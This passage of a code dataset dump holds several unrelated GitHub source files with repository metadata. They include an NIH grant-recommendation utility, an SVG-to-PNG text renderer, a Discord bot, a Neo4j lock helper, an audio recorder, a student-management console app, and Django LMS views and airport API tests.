for _,row in pred_grouped.iterrows():\n d = dict(zip(row['rfas_recom'], row['rfas_prob']))\n sort_d = dict(sorted(d.items(), key=lambda x: x[1], reverse=True))\n #print(sort_d)\n #break\n similarity_dict[row['pmid']] = sort_d \n with open(save_path + 'similarity_dict', 'wb') as handle:\n pickle.dump(similarity_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return similarity_dict, max_length \n \n \n \n \n## need to modify something from here\n\"\"\"\ndef processCVrfa(f_name, l_name, m_name, rfa_ls, processed_path = 'data/', output_path= 'results_v0/'):\n \n pubs_output = './resources/'+ l_name + '.pickle'\n cv_path= './resources/'+ l_name +'CV.pdf'\n output_path = output_path +l_name+'_output.json'\n \n old_time = datetime.now()\n final_data = Master().process(cv_path, pubs_output, f_name, l_name, m_name)\n final_data['researcher_name'] = f_name + ' ' + m_name + ' ' + l_name\n import json\n json.dump(final_data, open(output_path, 'w'), indent=4)\n print(datetime.now()-old_time)\n \n #read in what we are interested in\n with open(processed_path + f_name + l_name + '_pubDetails', 'rb') as f:\n pubD = pickle.load(f)\n with open(processed_path + f_name + l_name + '_pmids', 'rb') as f:\n pmids = pickle.load(f) \n \n #create pairs and save it \n pairs = list(itertools.product(pmids, rfa_ls))\n df = pd.DataFrame(pairs, columns =['pmid','rfaid']) \n df.to_csv(processed_path + f_name +l_name + '_df.csv', index = False)\n \n #create dataloader\n rfa = RFADataProcessForPred(path = 'data_processed/', whospubs= f_name+ l_name + '_pubDetails' ,\n load_pretrained = False, load_path = '../DLrec/model_save_v6/', nosplit= True)\n\n rfa.dataframize_()\n #then to dataloader \n test_loader, test_pr = rfa.dataloaderize_() #dataloader right \n \n return rfa, test_loader, test_pr\n\"\"\"\n\ndef evaluate_batch_woLabels(Batch, model, cuda_device, haslabels= False):\n \n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n if haslabels: \n b_labels = Batch[3].cuda(cuda_device)\n \n with torch.no_grad():\n if haslabels:\n (loss, logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask,\n labels=b_labels) \n \n else:\n (logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask)\n \n\n # Move logits and labels to CPU\n logits_cpu = logits.detach().cpu().numpy()\n outputs = (logits_cpu,)\n if haslabels:\n label_ids_cpu = b_labels.to('cpu').numpy()\n outputs = (logits_cpu, label_ids_cpu, loss)\n\n return outputs\n\n\ndef getPredRes(model, test_loader, use_cuda, f_name, l_name):\n \n outpath = f_name.lower() + l_name.lower() + '/'\n \n model.eval()\n predictions , true_labels = [], []\n\n # Predict \n for batch in test_loader:\n #depends on what outputs are returned in the model, unpack the values\n logits_cpu, = evaluate_batch_woLabels(Batch = batch, \n model = model, \n cuda_device =use_cuda)\n\n # Store predictions and true labels\n predictions.append(logits_cpu)\n\n print('...DONE.')\n np.save(outpath + 'predictions', predictions)\n #stack all batches\n combine_predictions = np.concatenate(predictions, axis=0)\n #get the probablities\n probas = prob(combine_predictions)\n #get the predictions labels \n pred_flat = np.argmax(combine_predictions, axis=1).flatten()\n np.save(outpath + 'probas', probas)\n np.save(outpath + 'pred_flat', pred_flat)\n \n #save results toghether with the paired list\n df = pd.read_csv(outpath + 'df.csv')\n dfnew = 
df.iloc[:len(probas),:].copy()\n dfnew['probas'] = probas\n dfnew['pred_flat'] = pred_flat\n dfnew.to_csv(outpath+ 'preds_df.csv', index = False )\n \n return pred_flat, probas\n\n\ndef getGrantTypes(linktopage):\n \"\"\"\n linktopage: should be a single, syntaxtly correct url \n return: a list of content, could be len==1 or more\n \"\"\"\n page = requests.get(linktopage.strip(\" ;\")) # make sure url is clean\n try:\n soup = BeautifulSoup(page.content, 'html.parser')\n conts = []\n for elem in soup(href=lambda href: href and \"Search_Type=Activity\" in href):\n content = elem.parent.a.text + ' ' +elem.parent.a.find_next_sibling(text=True).strip(' ,')\n conts.append(content)\n return conts\n except:\n print('connection problem')\n \n \ndef mergeRes(pathTilName):\n \"\"\"\n mini function to combine recommendation results with clustering rsults \n \"\"\"\n with open( pathTilName + '_clusteredRes.json', 'r') as f:\n file1 = json.load(f)\n recommended_ls = []\n for k,v in file1.items():\n if len(v) != 0:\n recommended_ls.append(v)\n with open( pathTilName + '_outwname.json', 'r') as f:\n file2 = json.load(f)\n # file 2 is the target\n temp = file2['data']\n new_data = []\n assert len(temp) == len(recommended_ls)\n for i, each in enumerate(temp):\n #print(each)\n each.update({'recommended_rfas': recommended_ls[i]})\n new_data.append(each)\n file2['data'] = new_data\n # write it out \n with open(pathTilName+ '_output.json', 'w') as f:\n json.dump(file2, f, indent =4) \n \n\ncategory_types = {'R': 'Research Grants (R series)',\n 'K': 'Career Development Awards (K series)', \n 'T': 'Research Training and Fellowships (T & F series)',\n 'F': 'Research Training and Fellowships (T & F series)',\n 'P': 'Program Project/Center Grants (P series)'}\n \n \ndef renameRes(file):\n \"\"\"\n mini function to rewrite recommendation results with clustering rsults _output.json\n \"\"\"\n with open( file, 'r') as f:\n file1 = json.load(f)\n # file 2 is the target\n temp = file1['data']\n new_data = []\n for i, each in enumerate(temp):\n #print(each)\n each_rfa = each.pop('recommended_rfas')# this dictionary \n # renaming a bunch of things\n new_each_rfa = []\n for j, ele in enumerate(each_rfa):\n ele['id'] = ele.pop('rfa_id')\n ele['link'] = ele.pop('rfa_links')\n ele['title'] = ele.pop('rfa_title')\n ele['purpose'] = ele.pop('rfa_purpose')\n ztemp = ele.pop(\"rfa_releaseDate\")\n matches = list(datefinder.find_dates(ztemp))\n ele['release_date'] = matches[0].strftime('%m/%d/%Y') if len(matches)> 0 else ztemp\n ztemp = ele.pop(\"rfa_ExpireDate\")\n matches = list(datefinder.find_dates(ztemp))\n ele['expired_date'] = matches[0].strftime('%m/%d/%Y') if len(matches)> 0 else ztemp \n candis = re.findall(r'[a-zA-Z]{2}[0-9]{1}|[a-zA-Z]{1}[0-9]{2}',ele['title'])\n if len(candis) == 0:\n candi = 'UNK'\n elif len(candis) ==1:\n candi = candis[0]\n else:\n candi = '/'.join(candis)\n ele['Activity_Code'] = candi\n ele['Organization'] = ''\n ele['Clinical_Trials'] = ''\n ele['matched_words'] = ''\n ele['rank'] = j\n ele['score'] = 999\n ele[\"agency\"]= \"NIH\"\n ele['category'] = ele['Activity_Code']\n ele['type'] = category_types.get(ele['Activity_Code'][0], 'Other')\n ele.pop('rfa_types')\n new_each_rfa.append(ele) \n each.update({'recommended_rfos': new_each_rfa}) #list of 20\n new_data.append(each)\n file1['data'] = new_data\n # write it out\n print('writing to {}'.format(file))\n with open(file, 'w') as f:\n json.dump(file1, f, indent =4) \n \n \n \n \n \n \n \n \n \n \n \n \n \ndef clustered_recom(f_name, m_name, 
l_name, data_path, logger, top = 20):\n \n # publication cluster information\n out_path = f_name.lower() + l_name.lower() + '/'\n clusters = pickle.load(open( out_path +'clusteredPubs', 'rb'))\n all_pmids = pickle.load(open( out_path+'pmids', 'rb'))\n all_years = pickle.load(open( out_path+ 'pubYrs', 'rb'))\n #get the rfas \n rfas = pd.read_csv(data_path + 'processed_nih_grants_only.csv') \n \n #year weight formula\n yearW = YearWeight()\n \n #get the predictions with 1s only\n pred_df = pd.read_csv(out_path + 'preds_df.csv')\n pred_df_keep = pred_df.loc[pred_df['pred_flat'] == 1,:].copy()\n pred_df_keep.reset_index(drop= True, inplace = True)\n \n \n clusters_rec = {}\n for i in clusters: # enumerate key\n cluster_i = {}\n idx = clusters[i]\n temp_pmid = np.take(all_pmids, idx)\n temp_yr = np.take(all_years, idx)\n \n if len(idx)==1:\n #in this case, we only have 1 publication per cluster, no need to consider the year effect\n recom_df = pred_df_keep.loc[pred_df_keep['pmid']==temp_pmid[0],:].copy() \n recom_df.reset_index(drop = True, inplace = True)\n results = recom_df['probas'].sort_values(ascending= False)\n \n \n else:\n #in this case, yes, we need to consider the year effect\n #do separatetly for each pmid, merge and sort\n recom_dfs = []\n for j, pmid in enumerate(temp_pmid):\n df = pred_df_keep.loc[pred_df_keep['pmid']== int(pmid),:].copy() \n df.reset_index(drop = True, inplace = True)\n df['score'] = yearW.calculate_weight(vec = df.probas, publication_year= int(temp_yr[j]))\n #print(df.head())\n recom_dfs.append(df[['rfaid','score']])\n recom_df = reduce(lambda x, y: pd.merge(x, y, on = 'rfaid'), recom_dfs) \n recom_df = pd.DataFrame(recom_df.T.groupby([s.split('_')[0] for s in recom_df.T.index.values]).sum().T, \n columns = ['rfaid', 'score'])\n #print(recom_df.head())\n #print([s.split('_')[0] for s in recom_df.T.index.values])\n results = recom_df['score'].sort_values(ascending= False) \n #print(results)\n \n recom_rfas = np.take(recom_df['rfaid'].tolist(), list(results.index))\n #print(recom_rfas[:10])\n cluster_i['rfa_id'] = recom_rfas[:top] \n #get the titles \n recom_rfa_titles = [rfas.query('funding_opportunity_number==@rfa')['funding_opportunity_title'].values[0]\\\n for rfa in recom_rfas[:top]]\n cluster_i['rfa_title'] = recom_rfa_titles[:top]\n #get the links\n recom_rfa_links = [rfas.query('funding_opportunity_number==@rfa')['link_to_additional_information'].values[0].strip('; ') \\\n for rfa in recom_rfas[:top]]\n cluster_i['rfa_links'] = recom_rfa_links\n recom_rfa_types = [getGrantTypes(link) for link in recom_rfa_links] # a list of lists\n cluster_i['rfa_types'] = recom_rfa_types\n # cluster_i['rfa_link'] = recom_rfa_links[:top] \n # get the grant types, this needs information of the 'link_to_additional_information' and crawl under 'Activity Codes'\n 'view-source:https://grants.nih.gov/grants/guide/rfa-files/RFA-DK-19-501.html'\n # get the purpose\n recom_rfa_desc = [rfas.query('funding_opportunity_number==@rfa')['description'].values[0] for rfa in recom_rfas[:top]]\n cluster_i['rfa_purpose'] = recom_rfa_desc#[:top]\n # get the dates \n recom_rfa_releases = [rfas.query('funding_opportunity_number==@rfa')['posted_date'].values[0].strip() for \\\n rfa in recom_rfas[:top]]\n cluster_i['rfa_releaseDate'] = recom_rfa_releases#[:top]\n recom_rfa_exps = [rfas.query('funding_opportunity_number==@rfa')['current_closing_date_for_applications'].values[0].strip() \\\n for rfa in recom_rfas[:top]]\n cluster_i['rfa_ExpireDate'] = recom_rfa_exps#[:top]\n # repeat the column 
name as dictionary key, so each cluster has a list of same-structured dictionary as results \n clusters_rec['cluster'+str(i)] = list(pd.DataFrame.from_dict(cluster_i).T.to_dict().values())\n # write the results\n if m_name.strip() =='':\n name = f_name + '_' + l_name \n else:\n name = f_name + '_' + m_name + '_' + l_name \n logger.error('{}: total {} clusters, recommended {} rfas per cluster'.format(name, len(clusters), top)) \n logging.shutdown()\n for handler in logger.handlers:\n if isinstance(handler, logging.FileHandler):\n handler.close() \n with open(out_path + name + '_clusteredRes.json', 'w') as f:\n json.dump(clusters_rec, f)\n \n # combine results \n mergeRes(pathTilName = out_path + name)\n renameRes(file = out_path + name)\n \n return clusters_rec\n \n\n\n\n","repo_name":"ashraf-yaseen/VRA","sub_path":"grants_rec/service/utils_bert_service.py","file_name":"utils_bert_service.py","file_ext":"py","file_size_in_byte":37870,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"10821494795","text":"import re\nimport sys\nimport os\n\ndef makepic(text,colour,longword):\n\n infile = 'bang.svg'\n outfile = 'outfile.svg'\n print(text)\n with open(infile) as file: # Use file to refer to the file object\n data = file.readlines()\n\n with open(outfile,'w') as ofile:\n \n for line in data:\n line = re.sub('FOO',text,line.rstrip())\n line = re.sub('#0000ff',colour,line.rstrip())\n if longword==True:\n line = re.sub(\"font-size=\\\"16\\\"\",\"font-size=\\\"10\\\"\",line.rstrip())\n \n ofile.write(line)\n \n os.system('inkscape -z outfile.svg -e outfile_'+text+'.png')\n os.system('rm '+outfile)\n\n#makepic(\"longwords\",'',True)\n","repo_name":"opensourcegrappler/ComicBoomBot","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70477693921","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from .Cogs.polls_cog import Poll\n\n from nextcord import Member\n\nimport asyncio\nfrom time import time\n\nfrom nextcord import Intents\nfrom nextcord.ext import commands\n\ntry:\n from .config import prefix, FEEDBACK_CHANNEL\nexcept:\n from .config_example import prefix, FEEDBACK_CHANNEL\n\nclass StoreBot(commands.Bot):\n def __init__(self) -> None:\n intents: Intents = Intents.all()\n intents.presences = False\n super().__init__(\n command_prefix=commands.when_mentioned_or(prefix),\n case_insensitive=True,\n intents=intents,\n help_command=None\n )\n\n self.bot_added_roles_lock: asyncio.Lock = asyncio.Lock()\n self.bot_added_roles_queue: asyncio.Queue[int] = asyncio.Queue()\n\n self.bot_removed_roles_lock: asyncio.Lock = asyncio.Lock()\n self.bot_removed_roles_queue: asyncio.Queue[int] = asyncio.Queue()\n \n self.statistic_lock: asyncio.Lock = asyncio.Lock()\n self.bot_feedback_channel: int = FEEDBACK_CHANNEL\n self.current_polls: list[Poll] = []\n \n self.text_lock: asyncio.Lock = asyncio.Lock()\n # guild_id: {text_channel_id}\n self.ignored_text_channels: dict[int, set[int]] = {}\n\n self.voice_lock: asyncio.Lock = asyncio.Lock()\n self.startup_time: int = int(time())\n # guild_id: member_id: Member\n self.members_in_voice: dict[int, dict[int, Member]] = {}\n # guild_id: {voice_channel_id}\n self.ignored_voice_channels: dict[int, set[int]] = {}\n\n self.member_join_remove_lock: asyncio.Lock = asyncio.Lock()\n # guild_id: channel_id\n 
self.join_remove_message_channels: dict[int, int] = {}\n\n # Dummy listener.\n async def on_application_command_error(*args) -> None:\n return\n","repo_name":"i80287/studpid-bot","sub_path":"storebot/storebot.py","file_name":"storebot.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30292330870","text":"import contextlib\nimport logging\n\nfrom cloud_snitch.models import EnvironmentLockEntity\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass EnvironmentLock:\n \"\"\"Simple class for locking an environment.\"\"\"\n def __init__(self, driver, account_number, name):\n \"\"\"Init the lock\n\n :param driver: Instance of driver\n :type driver: neo4j.v1.GraphDatabase.driver\n :param account_number: Environment account number\n :type account_number: str\n :param name: Environment name\n :type name: str\n \"\"\"\n self.driver = driver\n self.account_number = account_number\n self.name = name\n\n # When key is 0, the lock is open\n self.key = 0\n\n def lock(self):\n \"\"\"Lock the environment.\n\n Calls the entity lock method.\n Saves the key for unlocking the environment later.\n \"\"\"\n with self.driver.session() as session:\n self.key = EnvironmentLockEntity.lock(\n session,\n self.account_number,\n self.name\n )\n\n @property\n def locked(self):\n \"\"\"Return whether or not the lock is locked.\n\n :returns: True for locked, False otherwise\n :rtype: bool\n \"\"\"\n return self.key != 0\n\n def release(self):\n \"\"\"Releases the lock.\n\n No action is taken if the lock is open\n \"\"\"\n # Return early if not locked\n if self.key is None:\n return\n\n # Call entity release method\n with self.driver.session() as session:\n released = EnvironmentLockEntity.release(\n session,\n self.account_number,\n self.name, self.key\n )\n\n if released:\n self.key = 0\n else:\n logger.warning(\n 'Unable to release lock with key: {}'.format(self.key)\n )\n\n\n@contextlib.contextmanager\ndef lock_environment(driver, run):\n \"\"\"Lock an environment\n\n Prevents multiple sync instances from updating a single environment\n at the same time.\n\n :param driver: Driver instance\n :type driver: neo4j.v1.GraphDatabase.driver\n :param run: Collection run data structure.\n :type run: cloud_snitch.run.Run\n :yields: The environment lock object\n :ytype: Environment\n \"\"\"\n # Start the lock object\n lock = EnvironmentLock(\n driver,\n run.environment_account_number,\n run.environment_name\n )\n try:\n # Obtain the lock\n lock.lock()\n logger.debug(\"Obtained lock on {}: {}\".format(\n lock.account_number,\n lock.key\n ))\n yield lock\n finally:\n # Attempt to release the lock\n if lock.locked:\n lock.release()\n logger.debug(\"Released lock on {}: {}\".format(\n lock.account_number,\n lock.name)\n )\n","repo_name":"absalon-james/cloud_snitch","sub_path":"cloud_snitch/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71913701603","text":"from datetime import datetime\nimport threading\nimport wave\nfrom time import strftime\n\nimport pyaudio\n\n\nclass Recording:\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n RATE = 44100\n RECORD_SECONDS = 5\n WAVE_OUTPUT_FILENAME = \"record\"\n\n def __init__(self, label):\n self.lock = threading.Lock()\n self.frames = []\n self.label = label\n\n def start(self, seconds):\n self.RECORD_SECONDS = seconds\n try:\n print(\"* 
recording\")\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK)\n except:\n return \"Запись невозможна. Микрофон не обнаружен. Проверьте работу микрофона и перезапустите приложение.\"\n\n for i in range(0, int(self.RATE / self.CHUNK * self.RECORD_SECONDS)):\n data = self.stream.read(self.CHUNK)\n self.frames.append(data)\n self.label.update(int(i / self.RATE * self.CHUNK))\n\n print(\"* done recording\")\n\n self.stream.stop_stream()\n self.stream.close()\n self.p.terminate()\n\n wf = wave.open(str(self.WAVE_OUTPUT_FILENAME) + \"_\" + strftime(\"%Y_%m_%d_%H_%M_%S\") + \".wav\", 'wb')\n wf.setnchannels(self.CHANNELS)\n wf.setsampwidth(self.p.get_sample_size(self.FORMAT))\n wf.setframerate(self.RATE)\n wf.writeframes(b''.join(self.frames))\n wf.close()\n\n\n\n","repo_name":"BuzunovViktor/EGEaudioRec","sub_path":"src/Recording.py","file_name":"Recording.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15612699521","text":"\n\n# V1 \nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __repr__(self):\n if self:\n return \"{} -> {}\".format(self.val, repr(self.__next__))\n\nclass Solution(object):\n # @param head, a ListNode\n # @param x, an integer\n # @return a ListNode\n def partition(self, head, x):\n left = []\n right = []\n cur = head \n while cur:\n if cur.val < x:\n left.append(cur.val)\n else:\n right.append(cur.val)\n\n cur = cur.__next__ \n return left + right \n\n# V2 \n# Time: O(n)\n# Space: O(1)\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __repr__(self):\n if self:\n return \"{} -> {}\".format(self.val, repr(self.__next__))\n\nclass Solution(object):\n # @param head, a ListNode\n # @param x, an integer\n # @return a ListNode\n def partition(self, head, x):\n dummySmaller, dummyGreater = ListNode(-1), ListNode(-1)\n smaller, greater = dummySmaller, dummyGreater\n\n while head:\n if head.val < x:\n smaller.next = head\n smaller = smaller.__next__\n else:\n greater.next = head\n greater = greater.__next__\n head = head.__next__\n\n smaller.next = dummyGreater.__next__\n greater.next = None\n\n return dummySmaller.__next__\n\n\n\n","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Two_Pointers/partition-list.py","file_name":"partition-list.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"17418012385","text":"\n# 学生信息列表数组\n#\n# 1。查询所有的学生信息\n# 2。搜索学生信息\n# 3。增加学生信息\n# 4。修改学生信息\n# 5。删除学生信息\n# 6。退出系统\n#\n\nstudent_list =[]\n\ndef user_list():\n print('1.查询所有的学生信息')\n print('2.搜索学生信息')\n print('3.增加学生信息')\n print('4.修改学生信息')\n print('5.删除学生信息')\n print('6.退出系统')\n user_input = input('输入选择的')\n return user_input\n\ndef inquire_list():\n for user in student_list:\n print(user)\n\ndef search_list():\n iput = input('输入搜索学生姓名')\n flage = False\n for user in student_list:\n if user['name'] == iput:\n flage = True\n print(user)\n if not flage:\n print('没有搜索到学生')\n\ndef add_list():\n user_name = input('输入姓名')\n user_age = input('输入年龄')\n user_num = input('输入学号')\n student_list.append({'name':user_name,'age':user_age,'num':user_num})\n print('学生{}添加成功'.format(user_name))\n\ndef modify_list():\n iput = input('输入修改学生姓名')\n flage = False\n for user in student_list:\n if 
user['name'] == iput:\n flage = True\n user['name'] = input('输入修改学生姓名')\n user['age'] = input('输入修改学生年龄')\n user['num'] = input('输入修改学生学号')\n print('修改{}成功'.format(iput))\n if not flage:\n print('没有{}学生'.format(iput))\n\ndef remove_lsit():\n iput = input('输入删除学生姓名')\n flage = False\n for user in student_list:\n if user['name'] == iput:\n flage = True\n student_list.remove(user)\n print('删除{}成功'.format(iput))\n if not flage:\n print('没有{}学生'.format(iput))\n\ndef main():\n while True:\n user = user_list()\n if user in ['1','2','3','4','5','6']:\n if user == '1':\n inquire_list()\n elif user == '2':\n search_list()\n elif user == '3':\n add_list()\n elif user == '4':\n modify_list()\n elif user == '5':\n remove_lsit()\n else:\n print('再见')\n break\n\n\nif __name__ == '__main__':\n main()","repo_name":"lzs1314/pythonWeb","sub_path":"week1/学生管理系统.py","file_name":"学生管理系统.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38846727108","text":"import os\nimport cv2\n\n\nvideo_folder_path = \"videos\" # Folders to load videos and store frames\ndata_folder_path = \"data\"\n\nif not os.path.isdir(data_folder_path): # Creates data folder if there is none\n os.mkdir(data_folder_path)\n\nos.chdir(data_folder_path)\n\nvid = 0\nfor file in os.listdir(\"../\" + video_folder_path): # Loops through videos\n if file[0] == \".\":\n continue\n\n file_path = \"../\" + video_folder_path + \"/\" + file\n\n cap = cv2.VideoCapture(file_path)\n\n i = 0\n\n while(cap.isOpened()): # Saves every 100th frame in data folder\n ret, frame = cap.read()\n if ret == False:\n break\n if i%100==0:\n cv2.imwrite('video' + str(vid) + 'img'+str(i)+'.jpg',frame)\n print(f\"Img number {i} written.\")\n i+=1\n vid += 1\n\n cap.release()\n cv2.destroyAllWindows()\n","repo_name":"markushector/bjj-project","sub_path":"data/image_processing/video_to_frame.py","file_name":"video_to_frame.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7495697151","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport argparse\n\ndef main(args):\n\n folderdir = args.folderdir\n slab = args.slab\n date = args.date\n cint = args.cint\n \n folder = '%s_slab2_%s'%(slab,date)\n supplement = pd.read_csv('%s/%s_slab2_sup_%s.csv'%(folderdir,slab,date))\n \n os.system(\"rm %s/%s_slab2_c%i_%s.txt\"%(folderdir,slab,cint,date))\n contourlist = np.arange(100,700,cint)\n depthlist = np.array(list((set(supplement.depth))))\n with open('%s/%s_slab2_c%i_%s.txt'%(folderdir,slab,cint,date),'a') as f:\n for c in contourlist:\n distdepths = np.abs(c-depthlist)\n supdep = depthlist[np.argmin(distdepths)]\n dat = supplement[supplement.depth == supdep]\n if len(dat) > 0:\n if slab == 'izu' or slab == 'man' or slab == 'ker':\n dat = dat.sort_values(by=['lat'], ascending=False)\n if slab == 'sol' or slab == 'hin' or slab == 'pam':\n dat = dat.sort_values(by=['lon'], ascending=False)\n f.write('> %i \\n'%c)\n dat = dat[['lon','lat']]\n dat.to_csv(f,header=False,index=False,sep=' ')\n\n\n# Help/description and command line argument parser\nif __name__=='__main__':\n desc = '''\n Expects slab (-s), model-date(-d), path to output folder(-f)\n '''\n parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawDescriptionHelpFormatter)\n \n parser.add_argument('-s', '--slab', dest='slab', type=str,\n required=True, help='three 
letter slab code')\n parser.add_argument('-d', '--date', dest='date', type=str,\n required=True, help='date for model (MM.DD.YY)')\n parser.add_argument('-f', '--folderdir', dest='folderdir', type=str,\n required=True, help='directory/to/[slab]_slab2_[date] folder')\n parser.add_argument('-i', '--cint', dest='cint', type=int,\n required=True, help='contour interval (km)')\n\n pargs = parser.parse_args()\n \n #cProfile.run('main(pargs)')\n main(pargs)\n","repo_name":"ginevmoore/Slab2","sub_path":"makecontours.py","file_name":"makecontours.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21962417686","text":"\n\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import CreateView, TemplateView, ListView\nfrom .. import forms\nfrom django.template.loader import render_to_string\nfrom accounts.models import User\nfrom django.http import JsonResponse, Http404\nfrom django.contrib.auth.models import Group\nfrom django.views.generic.edit import FormMixin\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom .. models import Course\nfrom django.core.exceptions import PermissionDenied\n\n\nclass TestLMSAdmin(UserPassesTestMixin):\n \n def test_func(self):\n if not self.request.user.is_authenticated:\n # This will redirect to the 403 page\n raise PermissionDenied\n if not self.request.user.groups.filter(name='Admin Role').exists():\n # Redirect the user to 403 page\n raise PermissionDenied\n return self.dispatch\n\n\nclass ChoiceList(TestLMSAdmin, ListView):\n\n def get_context_object_name(self, object_list):\n object_name = self.kwargs['choice']\n return object_name\n\n def get_queryset(self):\n choice = self.kwargs['choice']\n user_type = {\n 'lms_admins': 'LA',\n 'instructors': 'IN',\n 'students': 'ST',\n }\n if choice in user_type:\n queryset = User.objects.filter(user_type=user_type[choice])\n\n elif choice == 'courses':\n queryset = Course.objects.all()\n else:\n raise Http404\n\n return queryset\n\n def get_template_names(self):\n template = {\n 'lms_admins': r'classroom/lms_admin/lms_admins.html',\n 'instructors': r'classroom/lms_admin/instructors.html',\n 'students': r'classroom/lms_admin/students.html',\n 'courses': r'classroom/lms_admin/courses.html',\n }[self.kwargs['choice']]\n return [template]\n\n\n# view used to handle creation of lms_admin, instructors, students, courses\nclass SignUpView(TestLMSAdmin, CreateView):\n info = dict()\n model = User\n\n def get_form(self, form_class=None):\n choice = self.kwargs['choice']\n form = {\n 'admin': forms.LMSAdminSignUpForm,\n 'instructor': forms.InstructorSignUpForm,\n 'student': forms.StudentSignUpForm,\n 'course': forms.CourseForm,\n }[choice]\n return form(**self.get_form_kwargs())\n\n def get(self, request, *args, **kwargs):\n choice = self.kwargs['choice']\n form = self.get_form()\n path = request.META.get('PATH_INFO')\n context = {'form': form, 'choice': choice.title(), 'path': path}\n self.info['html_form'] = render_to_string(\n 'classroom/includes/new_form_modal.html', context)\n return JsonResponse(self.info)\n\n def form_valid(self, form):\n form.save()\n self.info['valid'] = True\n return JsonResponse(self.info)\n\n def form_invalid(self, form):\n path = self.request.META.get('PATH_INFO')\n context = {'form': form,\n 'choice': self.kwargs['choice'].title(), 'path': path}\n self.info['valid'] = False\n self.info['html_form'] = render_to_string(\n 'classroom/includes/new_form_modal.html', 
context)\n return JsonResponse(self.info)\n","repo_name":"Akohrr/Learning-Management-System","sub_path":"classroom/views/lms_admin.py","file_name":"lms_admin.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"23122948122","text":"from unittest.mock import patch\n\nfrom django.test import TestCase, override_settings\n\nfrom rest_framework.test import APIClient\n\nfrom airport.models import Aircraft, StateChangeLog\n\n\ndef create_aircraft(call_sign, state='PARKED', type='AIRLINER', longitude=0,\n latitude=0, altitude=0, heading=0):\n return Aircraft.objects.create(\n call_sign=call_sign,\n state=state,\n type=type,\n longitude=longitude,\n latitude=latitude,\n altitude=altitude,\n heading=heading\n )\n\n\nclass StateChangeLogTests(TestCase):\n\n def setUp(self):\n self.client = APIClient()\n self.patcher = patch('airport.permissions.IsValidPublicKey.has_permission')\n self.public_key_is_valid = self.patcher.start()\n self.public_key_is_valid.return_value = True\n\n def tearDown(self):\n self.patcher.stop()\n\n ########################################\n # TESTS FOR ACCEPTED STATE CHANGE LOGS #\n ########################################\n\n def test_known_aircraft_from_PARKED_to_TAKE_OFF_accepted_log(self):\n aircraft = create_aircraft('CS123', state='PARKED')\n\n payload = {\n 'state': 'TAKE_OFF',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'TAKE_OFF', 'ACCEPTED')\n\n def test_known_aircraft_from_TAKE_OFF_to_AIRBORNE_accepted_log(self):\n aircraft = create_aircraft('CS123', state='TAKE_OFF')\n\n payload = {\n 'state': 'AIRBORNE',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'TAKE_OFF', 'AIRBORNE', 'ACCEPTED')\n\n def test_known_aircraft_from_AIRBORNE_to_APPROACH_accepted_log(self):\n aircraft = create_aircraft('CS123', state='AIRBORNE')\n\n payload = {\n 'state': 'APPROACH',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'AIRBORNE', 'APPROACH', 'ACCEPTED')\n\n def test_known_aircraft_from_APPROACH_to_LANDED_accepted_log(self):\n aircraft = create_aircraft('CS123', state='APPROACH')\n\n payload = {\n 'state': 'LANDED',\n 'public_key': 'dummy_public_key_that_we_consider_valid'\n }\n\n 